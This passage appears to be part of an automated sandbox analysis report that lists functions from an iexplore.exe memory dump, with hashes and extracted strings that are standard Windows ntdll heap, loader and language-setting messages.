                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-1700792311
                                  • Opcode ID: 645a26c0255ab34ad3e29ba4856c73440986bf4ee1f20a6835d7bda33620a9a3
                                  • Instruction ID: 68f28e0d2ce51dca37b5c58cc3c921a298e20d9edd9dda89909a948ec688694a
                                  • Opcode Fuzzy Hash: 645a26c0255ab34ad3e29ba4856c73440986bf4ee1f20a6835d7bda33620a9a3
                                  • Instruction Fuzzy Hash: A0D1BD39608B85DFCB26EF68C460AADFBF1FF4A710F088059E8469B752C7759981CB14
                                  Function 036AD08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 036AD0FD
                                  • @, xrefs: 036AD313
                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 036AD146
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 036AD2C3
                                  • @, xrefs: 036AD2AF
                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 036AD0CF
                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 036AD196
                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 036AD262
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                  • API String ID: 0-1356375266
                                  • Opcode ID: 985957a5c3400bcc1155ac8bed098961b77f8780c60b5a383db2f35c6d91ff5d
                                  • Instruction ID: 58c220ff6aa78a67eb0f93bb52af53737a0808d29334dfae846fd5b99a840951
                                  • Opcode Fuzzy Hash: 985957a5c3400bcc1155ac8bed098961b77f8780c60b5a383db2f35c6d91ff5d
                                  • Instruction Fuzzy Hash: 7DA16B759087059FD721DF29C490B5BFBE8BF88719F00892EEA9896240D774D908CF96
                                  Function 036AF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-523794902
                                  • Opcode ID: 0b4f70ea52ba12e5d3f3898c2e2cacb284b7aaa3ed0d45bba79de13291f7667d
                                  • Instruction ID: 879484293e934672620cd0e79f06d9d6956e1d1c144a806477fa3487d4c4881a
                                  • Opcode Fuzzy Hash: 0b4f70ea52ba12e5d3f3898c2e2cacb284b7aaa3ed0d45bba79de13291f7667d
                                  • Instruction Fuzzy Hash: 6042CB35208B81DFC714DF28C994A2AFBE5EF88204F18896DE4968B792D734EC41CF56
                                  Function 036CB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                  • API String ID: 0-122214566
                                  • Opcode ID: bb447b3ab92dd065aaeb11d42dd9854c557b3959f6a01516ae175fc441b0d10e
                                  • Instruction ID: 56226e660a0040d95c4e9b4190d92d0dcf625669731abe114c99a2350cd1c5c0
                                  • Opcode Fuzzy Hash: bb447b3ab92dd065aaeb11d42dd9854c557b3959f6a01516ae175fc441b0d10e
                                  • Instruction Fuzzy Hash: 45C13B31A10295ABDB24DF68C882BBEBB65EF45300F18416DEC069F381DBB4CC45D7A5
                                  Function 036E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  • Opcode ID: 456769f4748c6f7651c4fe7caf48e084bcc894207504475c0d963b9b06bd0c2a
                                  • Instruction ID: 792bfec7539353e40472dd6a7d2597ef190510c1a23acfde5ca753413553d05a
                                  • Opcode Fuzzy Hash: 456769f4748c6f7651c4fe7caf48e084bcc894207504475c0d963b9b06bd0c2a
                                  • Instruction Fuzzy Hash: 3F917835B01725DFEB25EF15D888BAEBBA4EF91B24F08812DE5147F281D7749801CBA0
                                  Function 036D51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                  Download Yara Rule
                                  Strings
                                  • Kernel-MUI-Language-Disallowed, xrefs: 036D5352
                                  • Kernel-MUI-Language-SKU, xrefs: 036D542B
                                  • WindowsExcludedProcs, xrefs: 036D522A
                                  • Kernel-MUI-Number-Allowed, xrefs: 036D5247
                                  • Kernel-MUI-Language-Allowed, xrefs: 036D527B
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 0-258546922
                                  • Opcode ID: 8eb6465ef813c900434132d8bbc5b3d9fbace901d21a811e0ea84891067b5419
                                  • Instruction ID: 93a6ca3503efd89a81093e6638233e20845583c7ffe2b2de1d1f33336f2fcdef
                                  • Opcode Fuzzy Hash: 8eb6465ef813c900434132d8bbc5b3d9fbace901d21a811e0ea84891067b5419
                                  • Instruction Fuzzy Hash: D2F15176D10219EFCB11DF98C9809EEBBF9FF49650F15406AE602EB610E7749E01CBA4
                                  Function 036C70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-3178619729
                                  • Opcode ID: 61c07a82eb9eb88d78a6f3fac10758a63e1d058d45d938c10b81c8125c9f20fb
                                  • Instruction ID: e2de4423d5bdff29e99debf708b72b3198943a1bb751f583274fe702c84740af
                                  • Opcode Fuzzy Hash: 61c07a82eb9eb88d78a6f3fac10758a63e1d058d45d938c10b81c8125c9f20fb
                                  • Instruction Fuzzy Hash: 1E139A70A106959FDB28CF68C9947B9FBB1FF49304F1881ADD849AB381D774A942CF90
                                  Function 036C1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-3570731704
                                  • Opcode ID: 4e2417177bf0c14ba778b47b1938a9ae6c42f5c44425003e615fb9993eec9be7
                                  • Instruction ID: fd7bf5999a61e7d0d87104540638d293b03876bcef52993cdabe9886bd522cd9
                                  • Opcode Fuzzy Hash: 4e2417177bf0c14ba778b47b1938a9ae6c42f5c44425003e615fb9993eec9be7
                                  • Instruction Fuzzy Hash: A5925775A11268CFEB24CB18C854BA9B7B5FF86310F0981EED849AB381D7749E81CF51
                                  Function 036BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  • Opcode ID: 577963dcac6851681c94a611b7b0f3380543c5714ae2517c7e25b15e41ecbf27
                                  • Instruction ID: c37e86b4583356d34427c904f17ab39d627e2fc277a656422a6619b82fb50ddf
                                  • Opcode Fuzzy Hash: 577963dcac6851681c94a611b7b0f3380543c5714ae2517c7e25b15e41ecbf27
                                  • Instruction Fuzzy Hash: 8AC189751083828FC720CF98C144BAAB7F4BF84704F04896EF9959B251E735CA8ACF66
                                  Function 036E273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 037221D9, 037222B1
                                  • .Local, xrefs: 036E28D8
                                  • SXS: %s() passed the empty activation context, xrefs: 037221DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 037222B6
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  • Opcode ID: 2ebf07cc4e75c2cb92eb7ff2177cb1d1005977ea790927e9bcf892caef1d1a00
                                  • Instruction ID: 588cfd1022c1a2b772aa8b2d204d365f7cf96685b63a2c90bd547568f5a19d0c
                                  • Opcode Fuzzy Hash: 2ebf07cc4e75c2cb92eb7ff2177cb1d1005977ea790927e9bcf892caef1d1a00
                                  • Instruction Fuzzy Hash: CAA1CF359012299BCB24DF55C898BA9B3B9BF58314F2909EAD808AB351D730DE85CF94
                                  Function 037611A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                  • API String ID: 0-336120773
                                  • Opcode ID: 6117157d0f7347d65f2013500828639069cc0fb55c81475fe99a3a0a57245e2c
                                  • Instruction ID: bb29596346c0cacaab79d995e5172d1b93e5d4ef948de43e952a1d832fd3b3fb
                                  • Opcode Fuzzy Hash: 6117157d0f7347d65f2013500828639069cc0fb55c81475fe99a3a0a57245e2c
                                  • Instruction Fuzzy Hash: 91312635300600EFC710DB9CC8A9F6AB3E8FF0A660F584159F913CB2A1D674EC80DA69
                                  Function 036A9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                  • API String ID: 0-1391187441
                                  • Opcode ID: 26b49417ceefc7b6e9093d8af73a6f256a6ac74ee91d59be6143c30e79c0a0b1
                                  • Instruction ID: a3653719a1e311534e40241493e8d02d9dff2a372e666ca9132a6796a3369e06
                                  • Opcode Fuzzy Hash: 26b49417ceefc7b6e9093d8af73a6f256a6ac74ee91d59be6143c30e79c0a0b1
                                  • Instruction Fuzzy Hash: 7331A476600608EFCB11DB59C885FAFBBF8EF46720F244165E915AB291D770ED80CE64
                                  Function 036C0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: 9ce9504cc6be992a2649f76ce573c6bba1d70a230c4277103f3b0021cb92b110
                                  • Instruction ID: 13071c35898fe0d48b9c0a444a0f9b37841e80cda88a390c3d8b7e4241e91656
                                  • Opcode Fuzzy Hash: 9ce9504cc6be992a2649f76ce573c6bba1d70a230c4277103f3b0021cb92b110
                                  • Instruction Fuzzy Hash: 44F1B975A10645EFDB29CF68C894B7AF7B5FB86304F1881ACE4169B381D734E981CB90
                                  Function 036AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  • Opcode ID: 1bbde50c9ae09cb212fc625d76190b89ebf5aa3c59f7997d61f38b92ace69e02
                                  • Instruction ID: 990f26bbde9fcea59338812b5bf724afe0388922276b288774ac422d89e8fad0
                                  • Opcode Fuzzy Hash: 1bbde50c9ae09cb212fc625d76190b89ebf5aa3c59f7997d61f38b92ace69e02
                                  • Instruction Fuzzy Hash: CDA18E759116299BDB31DF64CC88BAAF7B8FF48700F1401EAE909AB250D7359E84CF54
                                  Function 036E909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %$&$@
                                  • API String ID: 0-1537733988
                                  • Opcode ID: 9130a573b5a8272f31fe54e9779ed0c24b6aa0f69a6e81069876ac4eb8ec36c6
                                  • Instruction ID: 189af6ae4bb8bf1ba704c29e6db99a0624fba4095ba0c5836bf278600d66eb98
                                  • Opcode Fuzzy Hash: 9130a573b5a8272f31fe54e9779ed0c24b6aa0f69a6e81069876ac4eb8ec36c6
                                  • Instruction Fuzzy Hash: 9271E07451A3029FCB14DF24C580A6FFBE9FF85318F14891DE49A8B291D735D80ACB9A
                                  Function 0378B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                  Download Yara Rule
                                  Strings
                                  • TargetNtPath, xrefs: 0378B82F
                                  • GlobalizationUserSettings, xrefs: 0378B834
                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0378B82A
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                  • API String ID: 0-505981995
                                  • Opcode ID: b543bbeab62a11c701233e59a6c35379b8c89db23134dc86794b3dc5ff6a33ba
                                  • Instruction ID: 09377099b4a456b07a4e7e9fd5b65af844c47f71cb4d64e72f73de07240e3406
                                  • Opcode Fuzzy Hash: b543bbeab62a11c701233e59a6c35379b8c89db23134dc86794b3dc5ff6a33ba
                                  • Instruction Fuzzy Hash: D9618172941229EFDB21EF54CC88BEAB7B8AF09710F0101E9E509AB250C7749E85CF94
                                  Function 036AF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                  Download Yara Rule
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 0370E6A6
                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0370E6C6
                                  • HEAP: , xrefs: 0370E6B3
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                  • API String ID: 0-1340214556
                                  • Opcode ID: 8d86a756080e6505695b4e00f39522abaf482ca12330a6aca517fc1fa9f62cc9
                                  • Instruction ID: 88ae469eed449b19c4c480ee4599f976efe9348ad849b91b9d3d29c97d68c62c
                                  • Opcode Fuzzy Hash: 8d86a756080e6505695b4e00f39522abaf482ca12330a6aca517fc1fa9f62cc9
                                  • Instruction Fuzzy Hash: AE51F135204F84EFD722DBA8D998BAABBF8EF05300F0844A5E5818F692D774ED51CB11
                                  Function 036EC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 037282E8
                                  • Failed to reallocate the system dirs string !, xrefs: 037282D7
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 037282DE
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1783798831
                                  • Opcode ID: 03454dacce45e221c7c3af1e9fd5d7c664df58316e149d665cd05b28e652d605
                                  • Instruction ID: 8e5e57dbafc2ebfe810df09a4717fdd17e997e85844f75a850264dd6db338426
                                  • Opcode Fuzzy Hash: 03454dacce45e221c7c3af1e9fd5d7c664df58316e149d665cd05b28e652d605
                                  • Instruction Fuzzy Hash: 1D4125B5501714ABCB20FB28DD48B5B7BE8EF89750F08892EF948DB290E774D804CB95
                                  Function 0376C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 0376C1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0376C1C5
                                  • PreferredUILanguages, xrefs: 0376C212
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  • Opcode ID: b35d0cb36afc13a649ed2ddb594538947b3ba59813b21f3e3de7bf1506b84e27
                                  • Instruction ID: 794b00427f05e290be04c7552d9ea1b33a4854c2c901b19bccb9b0e6fb9283d5
                                  • Opcode Fuzzy Hash: b35d0cb36afc13a649ed2ddb594538947b3ba59813b21f3e3de7bf1506b84e27
                                  • Instruction Fuzzy Hash: 02417175E0020AEFDB12DAD4C8A1BEEB7B8AB08704F14406AEE46B7250D7749A44CB54
                                  Function 03744144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  • Opcode ID: 4d2b40013ee09d562f0b2dc4fad044a86586e6bd0c2626adc1e5134176a53ea4
                                  • Instruction ID: d3d988c500881deb81691c71dfb9469609b588cfc60db9d8e85b841a883146f7
                                  • Opcode Fuzzy Hash: 4d2b40013ee09d562f0b2dc4fad044a86586e6bd0c2626adc1e5134176a53ea4
                                  • Instruction Fuzzy Hash: EC41FF76A00788CBEB21DBA6C844BADB7B8EF46340F28045AD901FF791DB35A901DB10
                                  Function 03734755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrpCheckRedirection, xrefs: 0373488F
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 03734899
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03734888
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-3154609507
                                  • Opcode ID: 52e70e7499eb7c566832c68aed212f20a2a73b145810206ba042cfc8c2a4e7d4
                                  • Instruction ID: 09b0db053bac3e2f0a036290743d49d064800102b5be204f81070a3efb979180
                                  • Opcode Fuzzy Hash: 52e70e7499eb7c566832c68aed212f20a2a73b145810206ba042cfc8c2a4e7d4
                                  • Instruction Fuzzy Hash: 8141D436A147609FCB29DF6AD840A66B7E9EF8B750F09069DEC58DB312D730D800DB91
                                  Function 036E33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  • Actx , xrefs: 036E33AC
                                  • SXS: %s() passed the empty activation context data, xrefs: 037229FE
                                  • RtlCreateActivationContext, xrefs: 037229F9
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                  • API String ID: 0-859632880
                                  • Opcode ID: 50b1c4d84b4a44ccb7c1f2d241510f521d1b7aff74a47e539949f529b6e2c9d2
                                  • Instruction ID: 5f2a4af9ef0afdbe8bc444ad25f36fa3719626e94e104a9138a129a82be844d7
                                  • Opcode Fuzzy Hash: 50b1c4d84b4a44ccb7c1f2d241510f521d1b7aff74a47e539949f529b6e2c9d2
                                  • Instruction Fuzzy Hash: 68314637601315DFDB22DF58C884F9ABBA4EB44720F298469ED059F342DB30E845C7A0
                                  Function 036F1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 036F12A5
                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 036F127B
                                  • BuildLabEx, xrefs: 036F130F
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 0-3051831665
                                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                  • Instruction ID: bdcc1c2de958bc04d12b7c5991f2dd11c8918aeb8fae455cffcf3c795fadadb7
                                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                  • Instruction Fuzzy Hash: 5831A176900619EFCB11EFA5CC40EEEBFBDFB86750F004429EA04AB260D730DA058B54
                                  Function 037320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 03732104
                                  • LdrpInitializationFailure, xrefs: 037320FA
                                  • Process initialization failed with status 0x%08lx, xrefs: 037320F3
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  • Opcode ID: e6b162aee137a033573718cbf0bfb5cd0b186c10cc161c43aa07d86d8a9029d6
                                  • Instruction ID: bf6d784d58b08af66c797fb52dbd1d09a4d2355fd8d4cc8f88ee5fbdbc385677
                                  • Opcode Fuzzy Hash: e6b162aee137a033573718cbf0bfb5cd0b186c10cc161c43aa07d86d8a9029d6
                                  • Instruction Fuzzy Hash: 8FF02834740308BFEB10EA0CCD56FAA776CEB41B14F140459F6046B687D2B0A500CA80
                                  Function 036C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: 413288668dd2644e435705da7e33234d7dccdc91b3c1bafb1e6b265ab1c419fb
                                  • Instruction ID: 2d96a79c05b942d6437ed00470c446ee6940c2aac7d4761a26da86db0a3c324b
                                  • Opcode Fuzzy Hash: 413288668dd2644e435705da7e33234d7dccdc91b3c1bafb1e6b265ab1c419fb
                                  • Instruction Fuzzy Hash: 9F715C76A00249DFDB01DFA9C994BEEB7F8EF08704F154069E905EB251EA34ED11CB64
                                  Function 036C52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@
                                  • API String ID: 0-149943524
                                  • Opcode ID: 7825d79435dc721df366ad6bb05bb78bc075e6827438b7af4939ade12da8aebe
                                  • Instruction ID: 24a17d028324168c2a9cb6a9c7b47a75957a92713ce4f0b77f2cb7f48c91a4c8
                                  • Opcode Fuzzy Hash: 7825d79435dc721df366ad6bb05bb78bc075e6827438b7af4939ade12da8aebe
                                  • Instruction Fuzzy Hash: 9B32DF755183918BCB24CF1AC98073EF7E5EF86740F18491EFA869B2A0E734E851CB52
                                  Function 0377A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
